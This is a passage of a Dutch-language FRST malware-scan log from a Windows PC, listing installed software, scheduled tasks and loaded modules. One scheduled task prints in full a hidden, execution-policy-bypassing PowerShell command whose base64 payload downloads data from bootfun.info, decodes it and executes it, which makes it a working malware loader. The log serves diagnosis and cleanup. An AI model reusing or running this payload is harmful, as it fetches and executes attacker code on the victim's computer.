Windows Driver Package - Broadcom Bluetooth (06/15/2009 6.2.0.9000) (HKLM\...\6B8550A319DDC8B17F35F4A89988705E4592349B) (Version: 06/15/2009 6.2.0.9000 - Broadcom)
Windows Driver Package - Broadcom Bluetooth (07/30/2009 6.2.0.9405) (HKLM\...\6B6B5E96843E55CF5CF8C7E45FB457F1FE642FF1) (Version: 07/30/2009 6.2.0.9405 - Broadcom)
Windows Driver Package - Broadcom HIDClass (07/28/2009 6.2.0.9800) (HKLM\...\3BA80AB4C7E9F8497C115C844953A3D4BEB84D21) (Version: 07/28/2009 6.2.0.9800 - Broadcom)
Windows Essentials Media Codec Pack 3.6 [64-Bit] (HKLM-x32\...\Windows Essentials Media Codec Pack) (Version: 3.6 - Media Codec)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3505.0912 - Microsoft Corporation)
Windows Live Sync (HKLM-x32\...\{E34F703A-1C9D-4B1F-ABBE-D7E8800B860D}) (Version: 14.0.8117.416 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version: - )
WinFF 1.4.2 (HKLM-x32\...\WinFF_is1) (Version: - WinFF.org)
WinRAR (HKLM\...\WinRAR archiver) (Version: - )
World in Conflict MW Mod 2.0 Open Beta (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\World in Conflict MW Mod 2.0 Open Beta) (Version: - )
Wuala (HKU\S-1-5-21-1460008453-1702061876-2463211388-1000\...\Wuala) (Version: 1.0.444.0 - LaCie)
Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie)
Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie)

==================== Aangepaste CLSID (gefilterd): ==========================

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

CustomCLSID: HKU\S-1-5-21-1460008453-1702061876-2463211388-1000_Classes\CLSID\{C3BC25C0-FCD3-4F01-AFDD-41373F017C9A}\InprocServer32 -> C:\Users\Thomas\AppData\Local\Google\Update\1.3.26.9\psuser_64.dll => Geen bestand

==================== Geplande Taken (gefilterd) =============

(Als een item is opgenomen in de fixlist, wordt uit het register verwijderd. Het bestand zal niet worden verplaatst tenzij apart vermeld.)

Task: {0FEDF9F1-C757-433D-9853-B7387AAD6CD1} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {257C63E4-9A1B-4D19-B9E0-77E8A95CAB9A} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {39674482-7F1C-43BC-A918-7261BED6C338} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17] (Facebook Inc.)
Task: {397422DB-C117-4E84-99CD-C19801182DA8} - System32\Tasks\{8B4D71D3-DC18-FA14-C88F-B60E35A1D3FA} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGIAbwBvAHQAZgB1AG4ALgBpAG4AZgBvAC8AdQAvAD8AcQA9AFQAaABWAEcAUgBJAHUASgB2AGMAZQA0AG4ATwBXAEsAOQBhAHkAYgBCAGsAbgBGAEgAUgAxAHMAYwA5AG4ALQBUAFQANgBmAFkAbgBnAGIAWgBxAF8AdwBNAEEAMAB5AEwAYgB1AEUAMQBRAEoAWQBhADMATAB3AFEAMgBkAEkAQgBmAFcASgA3AEoAcwBlADQAOQBhAHgANwBqADMAMgBTAHgAdQBNAHEAXwBaAFIAcQBJAFgARABLAEoAXwB3AG4ANABEAGUAVgB0ADUAbwBVAEQAMABHAFAAMwBkAEsALQBxAEoAcgByAC0AMABOADIASABaAEYATgBhAG4AbgBGAEsAbQBQAGkANQBIAEkAYgBJAHQARQBBAG8ARABfAE8AYwBiAEcANQA3AFQAdgBCAE0AdgAtAC0AcABFAGoAVQBBAGEASgB1ADYASgBJAEQAZQBkAF8ALQBfAGgAMgBUAGoAZwAyAG8AOQBsAFAAZABOAGkAMQAwADQAeAAxAHMAcABUADgAYQBoAHIAcQAyAEUAbgBiAE4AVgBxAEwAVgBWADEAcwA2ADEAcgBaAHcARQBLAEwATQBwAG0AbgBVAE0AUgB6AHgANQBKAGoAZABEAEwAUwA4AGwAWgB1AFoAWgBIAFAAegBJAEgARABMAGsAcwAtAFYAeQBSAGsAeQBrADEANAB4AEUAQQBkAFkAMwBRAEoAbQAzADgALQBRAC0ASwBjAFMAYQBEAFYASQBWAGsANwBCAEYAagBsAE8AYgBLAGYAZQA5ADMAQQA5AEEAdABRADMARAB0AGkAQgBCAGYASgBJAHcANABLAEoAVABPAE4AMQBPADkANgBMAGYANwB6AHYAVQByADAAbgBNAGsAcAByAEcATQBpAGoAUABlAGkATwBwAFIANwBqAFAANAB1AEcARwBOAE0AcwA4AGkAbwA3AEoARwBQAEYAaABpAEgARwBIAHkARQA0AEwAYgBsAFUAYgBQAF8AdwBUAHMASgB2AHYAUABYAEEAWQBOAFQAUwBxADQAYwBnAFMAdgB4ADYAZgBiADEASwBZAGsATQBDAGYAYgBUAEIATAA1AGsAagBtAE4ALQBUAEEAWQBKAEYAdwBUADkARABIAEkARQB6AGgAcABtAGUAUQBWAEEATQBsAE0AWQBOAHkAZQBNAFYAcQB1AHUAYwB1AHUAMwAtAFcAdABuAGIASABNAHIAZgBQAG0ATABUAFUAJgBjAD0AWgA0AEMAeQBWAFkAVQBUAE8ASgAtAEYAQQA5AHoAUgBkAGQARQBWAFYANwBjAEUAagBsADMAbgB3AGUATgBOAGcAVwBFAHEAVABGAEgAcgBtAGkAYwBjAGsAZwBUADkAWgAwAE4AdgBJAFAAcgBjAEMAcAB2AHIAUQBTAHMAaABDAHUAMQBHADIARwAzAE4AQgBlAHoAcABiAEQAZABhAEMAeQBvAHEAVAAyADkARABTAGoAMgByADUAYgA5AG4AZwAyAEEAVAB4AGcANABJAEUAbQBpAGsAaAA4AGMAZwBHAGgAMgA0AFEAUABrADUARwBHAHEAWABpADYAbwBDAC0ARwBSAEEAbgBfAHcAQQAyAC0AVwAxAEcAawBmAG8AbgBxAEEAZABpAHkAcQA2AHQAXwAwAG0AbABhAFcAMgB1AFoAVAB4ADAATwBPADAAQwBCAEQASgBZADIARwBBAGsAWgBRAEUAUAB5AE4AcwBtAFIAUwBIAHEAQwBNADcAcgBmAFYAOQBBAE8AUQBrAEoARwA1AGoATQBnAGoAQwA1AFcAdgAxAFoAawBSADUAbwBFAFkAVQBEAFUASgA3AEkAVwBmAGwAWQBrAG8AaQBRAHQARwBKADIAMQBjAFkAcQBSAGIAYgBOAEkAVgB0AFMAUAA0AGcASgBFAG4AUQBmADEAbQBpAGcANABJAFAARwA2AFUANQBDADMAWgBYAEgAaQBiAHYAWQB2AHMAeQBfAGsASQB1AEsAeQBGAHAAcgBuAG8AZQBMAE8ASwAyAE4AegA2AHkARwByADMASgB2AGEAMwBLAFQAcQBaAE4ANQA2ADUAeQBWAFgAYgBxADgAdQBIADkARgAtAE0AeQBwAEIAUwAyAGwARgBQAEgAaAAwAFEAbwBiAFAASgAzAEoAVABIAG8AdgBmAHMASAA0AGUAUgA0AHQAOABaAEUAZQBlADgAUAA5AGcAegBYAGoASwBwAFIAawBLAFcAcABBAHcASgBuAFYAXwB5AEMAZwBwADUAZgBpAFUAQwAtAGgAawBOADAAbABtAEgANABpAEgAdQAtADkAQQBDAFEAdwBPAFMAVwBoAEcAeQA3AGgANQBjAGUANAA3AGwAdQAxAEEAaQB2ADUAQwBYADAAbQBZAGMAMgBDADgAcQBmAFgARgBHAFMAeABmADMAdAB1AEMAVQBRAFUAMAB3ADMAcwBHAEcAawBBAEsAOQBmAGcAaABXAGUAagAxADAATQB2ADYATABqAEUAUgBtADAANwBVADkAXwBPAHQAaQBsAFgAYgBnAEgAcwBpAEoAMQB4AHIAdABhAGoATQA1AGIAOQB2ADIAWgBrAFUAcQBDAHgAVABHADkANwBkAFYANgBjAG0AZABVAE8AVgBKAHAAZwBPAHAASABMAF8ATgB0AHEAUgBOAHYAawBVAFQAZABEAFUAcQByAEEAbgBQAG0AeQBFAEoAcQBHAGIAOAA3AGQAZQBxADEARgBoAGYAawBoAHIAUgBaAEkATQA0AFUASwBqAEwAdABrAEcARQAxAGIASAAyAFEAXwA0AEkAbABRAHEANgBqAFMAdgBtADAAVwByADIAXwBrAGUAYQB0AFYAWgB1AHkAZwBaAGQAOABjAFcAQwBNAEsARwBjAGoAZwBfAGgAMQB5ADcANQByADQAQwBBAEMALQB3ADQAbwBhAE8AdQBjAFEAMwBKAGsAcQBrAFMAdAAyAGcAOQBGADcASgBEAEEASQBXAGoAZQB2AHcAbgBzAEsAMwBXAHAATwBwAEgAJgByAD0ANAA5ADMAMgA0ADYAMgAzADMANgA3ADIAMAAzADcAOQA1ADgAMAAiADsAJABzAHQAcwBrAD0AIgB7ADgAQgA0AEQANwAxAEQAMwAtAEQAQwAxADgALQBGAEEAMQA0AC0AQwA4ADgARgAtAEIANgAwAEUAMwA1AEEAMQBEADMARgBBAH0AIgA7ACQAcAByAGkAZAA9ACIARABUACIAOwAkAGkAbgBpAGQAPQAiADAAIgA7AHQAcgB5AHsAaQBmACgAJABQAFMAVgBlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBpAG8AbgAuAE0AYQBqAG8AcgAgAC0AbAB0ACAAMgApAHsAYgByAGUAYQBrADsAfQAkAHYAPQBbAFMAeQBzAHQAZQBtAC4ARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AE8AUwBWAGUAcgBzAGkAbwBuAC4AVgBlAHIAcwBpAG8AbgA7AAoAaQBmACgAJAB2AC4ATQBhAGoAbwByACAALQBlAHEAIAA1ACkAewBpAGYAKAAoACQAdgAuAE0AaQBuAG8AcgAgAC0AbAB0ACAAMgApACAALQBBAE4ARAAgACgAKABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8ATwBwAGUAcgBhAHQAaQBuAGcAUwB5AHMAdABlAG0AKQAuAFMAZQByAHYAaQBjAGUAUABhAGMAawBNAGEAagBvAHIAVgBlAHIAcwBpAG8AbgAgAC0AbAB0ACAAMgApACkAewBiAHIAZQBhAGsAOwB9AH0ACgBpAGYAKAAtAE4ATwBUACAAKABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBQAHIAaQBuAGMAaQBwAGEAbABdAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEkAZABlAG4AdABpAHQAeQBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0ACgAKQApAC4ASQBzAEkAbgBSAG8AbABlACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAQgB1AGkAbAB0AEkAbgBSAG8AbABlAF0AIAAiAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAIgApACkAewBiAHIAZQBhAGsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAdwBjACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAZABzAHQAcgAoACQAcgBhAHcAZABhAHQAYQApAHsAJABiAHQAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAcgBhAHcAZABhAHQAYQApADsAJABlAHgAdAA9ACQAYgB0AFsAMABdADsAJABrAGUAeQA9ACQAYgB0AFsAMQBdACAALQBiAHgAbwByACAAMQA3ADAAOwBmAG8AcgAoACQAaQA9ADIAOwAkAGkAIAAtAGwAdAAgACQAYgB0AC4ATABlAG4AZwB0AGgAOwAkAGkAKwArACkAewAkAGIAdABbACQAaQBdAD0AKAAkAGIAdABbACQAaQBdACAALQBiAHgAbwByACAAKAAoACQAawBlAHkAIAArACAAJABpACkAIAAtAGIAYQBuAGQAIAAyADUANQApACkAOwB9AAoAcgBlAHQAdQByAG4AKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AUwB0AHIAZQBhAG0AUgBlAGEAZABlAHIAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4ARABlAGYAbABhAHQAZQBTAHQAcgBlAGEAbQAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgAJABiAHQALAAyACwAKAAkAGIAdAAuAEwAZQBuAGcAdABoAC0AJABlAHgAdAApACkAKQAsAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AH0ACgAkAHMAYwA9AGQAcwB0AHIAKAB3AGMAKAAkAHMAdQByAGwAKQApADsASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAALQBjAG8AbQBtAGEAbgBkACAAIgAkAHMAYwAiADsAfQBjAGEAdABjAGgAewB9ADsAZQB4AGkAdAAgADAAOwA=
Task: {43729264-2744-40AC-B524-E27E5435E40F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-19] (Google Inc.)
Task: {45B1D9F5-4E01-4C25-8EA0-309E3A42E0FC} - System32\Tasks\{3A842F23-6945-48D7-BD0B-B8BF1E563B7B} => pcalua.exe -a C:\Users\Thomas\Desktop\SetupFTD385\SetupFTD3.8.5.exe -d C:\Users\Thomas\Desktop\SetupFTD385
Task: {5A40E926-9E86-4B89-9CFD-B12311724371} - System32\Tasks\Microsoft\Windows\UPnP\UPnPHostConfig => config upnphost start= auto
Task: {5D0DE340-0D4F-4A04-975F-51D624188D89} - System32\Tasks\CCleanerSkipUAC => C:\Program Files (x86)\CCleaner\CCleaner.exe [2015-02-19] (Piriform Ltd)
Task: {652152BC-1A6F-4A69-8195-B6AD319E2A2A} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)
Task: {8BE38757-2493-4494-AB86-F8F4BF06A7E4} - System32\Tasks\Windows Codec Update Service => C:\Program Files (x86)\Essentials Codec Pack\WECPUpdate.exe [2011-07-14] (MediaCodec.Org)
Task: {A128DFD6-A81B-49BD-9796-1E3BB3141B94} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2015-03-22] (Adobe Systems Incorporated)
Task: {BAC338EB-2A0F-4CA2-91D2-3DB566B6E177} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30] (Dropbox, Inc.)
Task: {BB812E2B-BBD5-4BFB-A81B-CDE56BB6B604} - System32\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe [2012-07-17] (Facebook Inc.)
Task: {C8128D71-7F5D-42F2-8724-7D8C46CA2E69} - System32\Tasks\{9BEA03FA-903D-4CFD-AF30-7146078F46F0} => C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE [2015-12-11] (Microsoft Corporation)
Task: {D3ABE494-F430-4810-80FE-B3182580C7AB} - System32\Tasks\{DDA7CC43-0A4D-468A-A92C-5225F06876D6} => C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE [2015-12-11] (Microsoft Corporation)
Task: {DD9F510C-95F4-499A-90C8-BAC5BC372FF4} - System32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SvcRestartTask => start sppsvc
Task: {DF9F4691-7A55-4B6C-94D5-C6C9BF5811A5} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-19] (Google Inc.)
Task: {E6E43EF7-522A-4622-B7C3-88CF7850E374} - System32\Tasks\Launch HTC Sync Loader => C:\Program Files (x86)\HTC\HTC Sync 3.0\htcUPCTLoader.exe
Task: {E7388D23-6953-43D9-A5EB-B9B362355068} - System32\Tasks\{44F3AA93-0DB5-41FF-AB9A-2511FC6D6C4B} => Firefox.exe hxxp://ui.skype.com/ui/0/5.3.0.111.259/nl/abandoninstall?source=lightinstaller&page=tsDownload&installinfo=google-toolbar:notoffered;ienotdefaultbrowser2,google-chrome:notoffered;userlevelpresent
Task: {EFD6655D-12A3-4620-A5EE-AD497954D351} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-01-30] (Dropbox, Inc.)
Task: {F5F67ADC-174A-4474-86C3-E3D5985A97DB} - System32\Tasks\Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime => C:\Windows\system32\GWX\GWXUXWorker.exe [2015-12-05] (Microsoft Corporation)

(Als een item is opgenomen in de fixlist, de taak (job) bestand wordt verplaatst. Het bestand dat wordt uitgevoerd door de taak zal niet worden verplaatst.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000Core.job => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\FacebookUpdateTaskUserS-1-5-21-1460008453-1702061876-2463211388-1000UA.job => C:\Users\Thomas\AppData\Local\Facebook\Update\FacebookUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Snelkoppelingen =============================

(De items kunnen worden opgenomen in de fixlist.txt om hersteld of verwijderd te worden.)

==================== Geladen Modules (gefilterd) ==============

2015-03-22 14:33 - 2015-02-04 03:21 - 00115400 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-12-07 17:27 - 2012-12-07 17:27 - 00167424 _____ () C:\Program Files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe
2010-08-14 15:09 - 2010-08-17 22:20 - 00075064 _____ () C:\Windows\SysWOW64\PnkBstrA.exe
2010-08-15 11:12 - 2010-03-15 10:28 - 00166400 _____ () C:\Program Files\WinRAR\rarext.dll
2014-01-20 13:17 - 2014-01-20 13:17 - 00073544 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2014-10-11 12:05 - 2014-10-11 12:05 - 01044776 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-10-30 21:24 - 2014-10-30 21:24 - 03752448 _____ () c:\Program Files (x86)\VideoCnv\Zet.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00034768 _____ () C:\Program Files (x86)\Dropbox\Client\_multiprocessing.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00019408 _____ () C:\Program Files (x86)\Dropbox\Client\faulthandler.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00022848 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Random.OSRNG.winrandom.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00023352 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Util._counter.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00042296 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Cipher._AES.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00116688 _____ () C:\Program Files (x86)\Dropbox\Client\pywintypes27.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00093640 _____ () C:\Program Files (x86)\Dropbox\Client\_ctypes.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00018376 _____ () C:\Program Files (x86)\Dropbox\Client\select.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00019760 _____ () C:\Program Files (x86)\Dropbox\Client\tornado.speedups.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00105928 _____ () C:\Program Files (x86)\Dropbox\Client\win32api.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00392144 _____ () C:\Program Files (x86)\Dropbox\Client\pythoncom27.dll
2016-01-30 12:36 - 2015-12-22 01:22 - 00381752 _____ () C:\Program Files (x86)\Dropbox\Client\win32com.shell.shell.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00692688 _____ () C:\Program Files (x86)\Dropbox\Client\unicodedata.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020816 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._constant_time.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00109520 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_backend.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 01734984 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._openssl.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020808 _____ () C:\Program Files (x86)\Dropbox\Client\cryptography.hazmat.bindings._padding.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020800 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_python_x66cf7a7cx17a72769.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00021840 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_unicode_environ_win32_x8bf8e68bx9968e850.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00038696 _____ () C:\Program Files (x86)\Dropbox\Client\fastpath.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00024528 _____ () C:\Program Files (x86)\Dropbox\Client\win32event.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00020936 _____ () C:\Program Files (x86)\Dropbox\Client\mmapfile.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00114640 _____ () C:\Program Files (x86)\Dropbox\Client\win32security.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00021320 _____ () C:\Program Files (x86)\Dropbox\Client\_cffi_pywin_kernel32_xde9e4433x360333f0.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00124880 _____ () C:\Program Files (x86)\Dropbox\Client\win32file.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00030160 _____ () C:\Program Files (x86)\Dropbox\Client\win32pipe.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00043472 _____ () C:\Program Files (x86)\Dropbox\Client\win32process.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00175560 _____ () C:\Program Files (x86)\Dropbox\Client\win32gui.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00028616 _____ () C:\Program Files (x86)\Dropbox\Client\win32ts.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32clipboard.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00048592 _____ () C:\Program Files (x86)\Dropbox\Client\win32service.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00024392 _____ () C:\Program Files (x86)\Dropbox\Client\librsyncffi.compiled._librsyncffi.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00036296 _____ () C:\Program Files (x86)\Dropbox\Client\librsync.dll
2016-01-30 12:36 - 2015-12-21 20:42 - 00024016 _____ () C:\Program Files (x86)\Dropbox\Client\win32profile.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00117056 _____ () C:\Program Files (x86)\Dropbox\Client\breakpad.client.windows.handler.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00023376 _____ () C:\Program Files (x86)\Dropbox\Client\winscreenshot.compiled._CaptureScreenshot.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00134608 _____ () C:\Program Files (x86)\Dropbox\Client\_elementtree.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00134088 _____ () C:\Program Files (x86)\Dropbox\Client\pyexpat.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00240584 _____ () C:\Program Files (x86)\Dropbox\Client\jpegtran.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00020280 _____ () C:\Program Files (x86)\Dropbox\Client\cpuid.compiled._cpuid.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00052024 _____ () C:\Program Files (x86)\Dropbox\Client\psutil._psutil_windows.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00021304 _____ () C:\Program Files (x86)\Dropbox\Client\Crypto.Util.strxor.pyd
2016-01-30 12:36 - 2015-12-21 20:42 - 00350152 _____ () C:\Program Files (x86)\Dropbox\Client\winxpgui.pyd
2016-01-30 12:36 - 2015-12-22 01:22 - 00084792 _____ () C:\Program Files (x86)\Dropbox\Client\dropbox_sqlite_ext.DLL
